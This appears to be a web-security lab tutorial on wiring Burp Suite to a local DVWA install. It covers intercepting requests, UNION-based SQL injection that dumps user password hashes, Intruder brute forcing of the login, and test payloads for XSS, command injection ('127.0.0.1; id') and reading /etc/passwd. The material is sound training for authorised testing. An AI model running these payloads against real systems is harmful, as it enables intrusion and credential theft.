⚠️ Authorised Lab Use Only: DVWA Burp Suite Integration Lab uses Burp Suite to intercept, modify, and attack a DVWA installation. Run this exclusively against DVWA on your own local machine or dedicated lab environment. Never use Burp Suite’s active testing features — Intruder, Scanner, or Repeater attacks — against systems you don’t own or have explicit written authorisation to test. Unauthorised interception and manipulation of HTTP traffic is illegal in most jurisdictions.
You’ve been running DVWA and Burp Suite as separate tools. DVWA gives you the vulnerable target. Burp gives you the proxy. Most learners never connect them properly — they type SQL payloads directly in the browser form, get a response, and move on. That’s not how web application security testing works professionally.
The entire point of Burp Suite is that it sits between your browser and the target, giving you complete control over every HTTP request before it leaves your machine. Change parameters, add headers, inject payloads, replay requests hundreds of times with automated payload lists — all without touching the browser form again. When you combine DVWA’s known-vulnerable modules with Burp’s full interception capability, you have a complete professional testing workflow in a controlled environment.
DVWA Burp Suite Integration Lab 24 integrates everything: proxy configuration, request interception, Repeater-based SQL injection, Intruder-based brute force, and Scanner on the full DVWA attack surface. By the end of this lab you’ll run every DVWA module through Burp the way a professional web application tester does.
🎯 What You’ll Master in Lab 24
Configure Burp Suite as a proxy for DVWA — correctly, with HTTPS interception working
Intercept and modify DVWA requests in Burp Proxy before they reach the server
Use Burp Repeater to iterate SQL injection payloads against DVWA SQL module
Use Burp Intruder to automate credential attacks against DVWA Brute Force module
Run Active Scanner across the full DVWA attack surface and triage results
⏱️ 90 min lab · 3 terminal exercises · All Burp Community Edition
✅ Prerequisites
DVWA running locally (completed in
Lab 1 — DVWA Setup
)
Burp Suite Community Edition installed on Kali Linux (sudo apt install burpsuite)
Firefox browser available (Burp proxy configuration works best with Firefox)
Labs 7–8 complete:
SQL Injection Lab
and
Brute Force Lab
— you should understand the manual attack before automating it
Get this right first — a misconfigured proxy is the most common reason Burp labs fail. You need three things aligned: Burp listening on 8080, Firefox pointing to 8080, and the Burp CA certificate installed in Firefox for HTTPS interception.
BURP SUITE PROXY SETUP — STEP BY STEP
# Step 1: Launch Burp Suite Community Edition
burpsuite &
# Or from Applications menu → Web Application Analysis → burpsuite
Import → select burp.der → ☑ Trust to identify websites → OK
# Step 5: Verify interception working
Burp → Proxy → Intercept → turn Intercept ON
Firefox → navigate to http://127.0.0.1/dvwa/
Request appears in Burp Proxy Intercept tab ← success
Click Forward to let it through
securityelites.com
Burp Suite Proxy — Intercepted DVWA Login Request
POST /dvwa/login.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Cookie: PHPSESSID=abc123; security=low
username=admin&password=password&Login=Login
Forward
Drop
Send to Repeater
Send to Intruder
📸 Burp Suite Proxy intercepting a DVWA login POST request. The request is frozen mid-flight — you can modify any parameter before forwarding it to DVWA. Change the password value, add SQL payloads, modify headers, or send the request directly to Repeater or Intruder for further testing. This interception capability is what makes Burp Suite the professional standard for web application testing rather than just a browser with developer tools.
Step 2 — Intercept and Modify DVWA Requests
With Intercept ON, every request from Firefox pauses in Burp before reaching DVWA. This is how you test parameters that aren’t directly editable in the browser form — hidden fields, cookies, custom headers. Change the value, forward it, see what DVWA returns.
INTERCEPTING AND MODIFYING DVWA REQUESTS
# Set DVWA security level to Low via Burp (bypassing the form)
1. Navigate to DVWA Security page in Firefox
2. Enable Intercept → submit Security = Low form
3. In Proxy Intercept, modify the POST body:
security=low&seclev_submit=Submit
4. Forward — DVWA now runs at Low security
# Intercept SQL Injection request
Navigate to DVWA SQL Injection module in Firefox
Enable Intercept → submit User ID = 1
Request appears: GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
Modify id=1 to id=’ OR 1=1– – in the Intercept tab
Forward → DVWA returns all users
# Inspect cookies in intercepted requests
Cookie: PHPSESSID=abc123; security=low
# Modify security=low to security=high to test high-security behaviour
# Modify PHPSESSID to test session fixation scenarios
⚡ EXERCISE 1 — KALI TERMINAL (20 MIN)
Configure Burp Suite Proxy for DVWA and Intercept Your First Request
⏱️ 20 minutes · Burp Suite Community Edition + DVWA running
Step 1: Launch DVWA and verify it’s accessible
Browse to http://127.0.0.1/dvwa/login.php
Login: admin / password
Confirm DVWA dashboard loads
Step 2: Launch Burp Suite Community
burpsuite &
Accept default project settings
Go to Proxy → Options → confirm listener 127.0.0.1:8080
Step 3: Configure Firefox proxy
Firefox → Settings → Network Settings → Manual proxy
HTTP: 127.0.0.1 Port: 8080
☑ Use for all protocols
Step 4: Enable intercept and capture DVWA traffic
Burp → Proxy → Intercept → click “Intercept is off” to enable
Firefox → navigate to http://127.0.0.1/dvwa/vulnerabilities/sqli/
Watch Burp capture the GET request
Step 5: Modify the request
In Burp Intercept, change the parameter:
From: id=1
To: id=’ OR 1=1– –
Click Forward
Step 6: Observe the response
Firefox shows all users returned from DVWA
This confirms SQL injection works via Burp interception
Step 7: Disable Intercept to resume normal browsing
Burp → Proxy → Intercept → “Intercept is on” → click to disable
✅ What you just did: Configured a full Burp Suite proxy setup for DVWA and made your first manually injected SQL attack via Burp interception. The key difference from typing in the browser form: you can modify any parameter — including hidden fields, cookies, and headers — not just the visible inputs. Every professional web application test starts exactly here.
📸 Screenshot your Burp Proxy intercepting the DVWA SQL injection request with your modified payload visible. Share in #dvwa-labs
Step 3 — Burp Repeater: SQL Injection on DVWA
Repeater is the tool you’ll use most. Intercept a request once, send it to Repeater, and from there you can iterate payloads as fast as you can type — no reloading the browser, no re-entering form values, no losing track of which payload produced which response. This is how you work through a SQL injection enumeration systematically.
Right-click request in Proxy Intercept → Send to Repeater
Disable Intercept → switch to Repeater tab
# Step 2: Test basic injection in Repeater
In Repeater, modify id parameter → click Send after each
id=1′ → error confirms injection point
id=1′ OR ‘1’=’1 → returns all records (boolean true)
id=’ OR 1=1– – → returns all users
# Step 3: Count columns with ORDER BY
id=1′ ORDER BY 1– – → no error (1 column OK)
id=1′ ORDER BY 2– – → no error (2 columns OK)
id=1′ ORDER BY 3– – → error → 2 columns confirmed
# Step 4: UNION SELECT to extract data
id=-1′ UNION SELECT 1,2– –
Response shows which column positions are displayed
id=-1′ UNION SELECT user(),database()– –
Returns: current DB user and database name
# Step 5: Extract all users
id=-1′ UNION SELECT user,password FROM users– –
Returns all DVWA user:hash pairs
securityelites.com
REQUEST (Repeater)
GET /dvwa/vulnerabilities/sqli/
?id=-1’%20UNION%20SELECT%20user,password
%20FROM%20users–%20-
&Submit=Submit HTTP/1.1
Host: 127.0.0.1
Cookie: security=low; PHPSESSID=abc123
▶ SEND
RESPONSE (200 OK)
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
All 5 DVWA users extracted
📸 Burp Repeater showing a UNION SELECT SQL injection against DVWA with full credential extraction. Left panel: the modified GET request with the injection payload in the id parameter. Right panel: DVWA’s response returning all five user hashes. This took one click in Repeater — no re-entering the payload in the browser, no page reloads. The hashes can now be cracked with Hashcat (covered in Kali Lab 19) to recover plaintext passwords.
Step 4 — Burp Intruder: Brute Force on DVWA
Intruder automates what you did manually in Lab 2. Instead of typing passwords one by one, Intruder cycles through a wordlist and fires one request per entry. You set the payload position — the parameter you’re attacking — and Intruder does the rest. The result is a table of responses you sort by length or status to find successful logins.
BURP INTRUDER — DVWA BRUTE FORCE ATTACK
# Step 1: Capture DVWA Brute Force login request
Enable Intercept → Navigate to DVWA Brute Force module
Submit any username/password → catch request in Proxy
Right-click → Send to Intruder → Disable Intercept
✓ Credentials found: admin:password (response length 4741 vs 4597)
📸 Burp Intruder attack results against DVWA Brute Force module. All responses return HTTP 200 — DVWA doesn’t use different status codes for failed logins. The tell is the response Length column: failed logins return 4597 bytes, the successful login returns 4741 bytes (the success message adds length). Sort results by Length to immediately identify the correct credential. This length-based detection technique works on any application that uses the same status code for both success and failure responses.
⚡ EXERCISE 2 — KALI TERMINAL (25 MIN)
Burp Repeater SQL Injection + Intruder Brute Force on DVWA
⏱️ 25 minutes · Burp Suite proxy configured from Exercise 1
PART A — REPEATER SQL INJECTION (10 min)
Step 1: Intercept DVWA SQL Injection GET request
DVWA → SQL Injection → Submit ID = 1
Catch request in Proxy Intercept
Step 2: Send to Repeater
Right-click → Send to Repeater → switch to Repeater tab
Step 3: Count columns with ORDER BY
Modify id: 1′ ORDER BY 1– – → Send → note response
Modify id: 1′ ORDER BY 2– – → Send → note response
Modify id: 1′ ORDER BY 3– – → Send → note error
Result: 2 columns confirmed
Step 4: Extract database info
id: -1′ UNION SELECT user(),database()– – → Send
Record: DB user and database name from response
Step 5: Dump all credentials
id: -1′ UNION SELECT user,password FROM users– –
Record all 5 user:hash pairs
PART B — INTRUDER BRUTE FORCE (15 min)
Step 1: Set DVWA security to Low
Step 2: Navigate to DVWA Brute Force module
Intercept ON → submit any credentials
Right-click → Send to Intruder
Step 3: Configure positions
Clear all auto-positions
Mark only the password value as payload position
Step 5: Start attack and identify success
Sort by Response Length
Find the entry with different length = correct password
Record: username=admin, password=?
✅ What you just did: Ran a professional SQL injection enumeration using Burp Repeater — counting columns, finding displayed positions, extracting database credentials — and a credential brute force attack using Burp Intruder with payload list automation. These are the two most-used Burp tools in real web application security assessments. Every parameter you can intercept, you can attack this way.
📸 Screenshot Burp Intruder results table showing the successful login entry with different response length. Share in #dvwa-labs
Step 5 — Active Scanner on the Full DVWA Attack Surface
Burp’s Active Scanner (Professional Edition) sends thousands of crafted payloads across every parameter it discovers. Community Edition doesn’t include the automated scanner, but you can replicate most of it manually using the workflow below — and understanding how the scanner works makes you a better manual tester anyway.
DVWA FULL ATTACK SURFACE — MANUAL SCANNER APPROACH
# Build site map: browse all DVWA modules with Intercept off
Burp → Target → Site Map will populate as you browse
All parameters appear in Target → Site Map → 127.0.0.1
# Right-click any endpoint → Send all to Repeater for manual testing
SQL Injection: test id parameter with ‘ and UNION payloads
XSS Reflected: test name= with <script>alert(1)</script>
Command Injection: test ip= with 127.0.0.1; id
File Inclusion: test page= with ../../../../etc/passwd
# Pro tip: use Burp Comparer to diff responses
Send baseline response to Comparer → send injected response
Comparer highlights exactly what changed between responses
Useful for blind injection where the difference is subtle
Step 6 — Full Professional Workflow: Discover → Scan → Verify → Report
This is the workflow that ties everything together. In a real web application security assessment, you don’t jump straight to exploitation. You map the attack surface first, then test systematically, then verify manually what the automated phase found, then document. Running it on DVWA end-to-end in Burp gives you the muscle memory before you do it on a real programme.
DVWA FULL BURP ASSESSMENT WORKFLOW
# Phase 1: DISCOVER — Map the attack surface
Browse all DVWA modules with Intercept off → build site map
Target → Site Map → right-click 127.0.0.1 → Spider this host
All endpoints and parameters populated in site map
# Phase 2: SCAN — Test all parameters
For each module: intercept request → send to Repeater
File Inclusion (page parameter):
page=../../../../etc/passwd → confirms LFI
Finding: Local File Inclusion → High
Phase 3 — Verify (5 min)
Confirm unique impact for each finding
Screenshot: request in Repeater + server response
Phase 4 — Document (5 min)
Save Burp project
Screenshot each finding with: module, payload, response, severity
Write one-sentence impact statement per finding
Report your findings:
[x] SQL Injection — Critical — all user credentials extracted
[x] Reflected XSS — Medium — cookie theft demonstrated
[x] Command Injection — Critical — OS command execution confirmed
[x] Local File Inclusion — High — /etc/passwd read confirmed
✅ What you just did: Ran a structured web application security assessment against DVWA using Burp Suite’s full toolset — site mapping, parameter testing via Repeater, impact verification, and finding documentation. This four-phase workflow (Discover → Scan → Verify → Report) is what every professional web application security test follows regardless of scope size. You’ve now run it end-to-end. The only difference on a real engagement is the target — the workflow is identical.
📸 Screenshot your completed finding table with all 4 verified vulnerabilities. Share in #dvwa-labs
Intruder successSort results by Length — different length = successful login
Site mapTarget → Site Map → browse all DVWA modules with Intercept OFF
Save projectBurp Menu → Save Project File → saves all history and findings
✅ Lab 24 Complete — Burp Suite + DVWA Integrated
You can now run a structured web application security assessment using Burp Suite against DVWA. The proxy interception, Repeater iteration, and Intruder automation workflow you just completed is the foundation of professional web application penetration testing. Next lab: DVWA Automated Scan with Nikto and OWASP ZAP.
🧠 Lab 24 Check — Burp Suite Integration
You’ve intercepted a DVWA SQL injection GET request in Burp Proxy. You want to test 15 different UNION SELECT payloads and see the response for each. What’s the fastest way to do this in Burp Suite?
❓ Frequently Asked Questions — DVWA Burp Suite Lab 24
How do I set up Burp Suite as a proxy for DVWA?
Configure Firefox to use manual proxy settings: 127.0.0.1 port 8080 for HTTP and HTTPS. In Burp Suite, go to Proxy > Options and verify the listener is active on 127.0.0.1:8080. Enable Intercept in Burp Proxy. Navigate to DVWA in Firefox — all traffic routes through Burp. Install Burp’s CA certificate in Firefox for HTTPS interception (browse to http://burpsuite, download CA cert, import into Firefox Certificate Manager).
What is Burp Repeater used for in DVWA testing?
Burp Repeater lets you resend the same HTTP request with modified parameters without using the browser. For DVWA SQL injection, intercept a request, send it to Repeater, modify the id parameter to injection payloads, and click Send each time. You see the full server response instantly. Faster and more precise than typing payloads in the browser form — and you have the full request/response history in one tab.
How do I use Burp Intruder for DVWA brute force?
Intercept the DVWA Brute Force login request → Send to Intruder. In Positions tab, clear all markers and set a marker only on the password value. In Payloads tab, load a wordlist. Start the attack. Sort results by response Length — successful logins return a different page length (longer success page) than failed attempts. Find the outlier length entry for the correct password.
Does Burp Suite Community Edition work with DVWA?
Yes — all core tools covered in this lab (Proxy, Repeater, Intruder, site mapping) are fully available in Burp Suite Community at no cost. The automated Active Scanner is Professional Edition only, but manual testing via Repeater and Intruder achieves full coverage for DVWA’s known-vulnerable modules. Community Edition is the standard for learning web application security testing.
What DVWA modules can I test with Burp Suite?
Every DVWA module: SQL Injection (Repeater for payload iteration), Brute Force (Intruder for credential attacks), XSS (Proxy to capture and modify reflected parameters), CSRF (Proxy to examine token values and replay requests), Command Injection (Repeater for OS payload testing), File Upload (Proxy to modify Content-Type headers), and File Inclusion (Repeater for path traversal payloads).
How is Burp Suite different from browser developer tools for DVWA?
Browser developer tools show requests but don’t let you modify them before they’re sent. Burp Proxy intercepts mid-flight so you change any parameter, header, or body before forwarding. Burp Repeater lets you rerun the same request dozens of times with different payloads in seconds. Burp Intruder automates payload iteration across hundreds of values. Browser tools are for inspection. Burp is for active manipulation.
← Previous Lab
DVWA SQLi to OS Shell — Lab 23
Next Lab →
DVWA Automated Scan — Lab 25
📚 Further Reading
DVWA SQLi to OS Shell — Lab 23— The manual SQL injection escalation chain you automated parts of in this lab. Understanding the manual technique makes the Burp-assisted version much more effective.
DVWA Brute Force Advanced — Lab 15— Anti-CSRF token bypass during brute force — the advanced technique that builds on the Intruder workflow you ran in this lab.
PortSwigger Web Security Academy— Free labs built by the Burp Suite creators covering every web vulnerability class. The natural next step after completing this DVWA Burp integration lab.
Burp Suite Repeater Documentation— Official Repeater reference covering all features including keyboard shortcuts and response comparison — essential reading for getting faster with Burp.
ME
Mr Elite
Owner, SecurityElites.com
The moment Burp Suite clicked for me wasn’t when I found my first SQL injection — it was when I realised I’d been testing the same parameter five times by typing in the browser form, and Repeater would have done all five in thirty seconds. The tool isn’t complicated. It’s a proxy with a few features that change the mechanics of testing from manual to systematic. Once you integrate it with DVWA and run the full discover-scan-verify-report workflow even once, you’ll never test a web application without it again. The workflow you practised in Lab 24 is exactly what I run on real engagement day one — build the site map, get every request into Repeater, work through the parameters methodically. DVWA is the training ground. The workflow is the real skill.
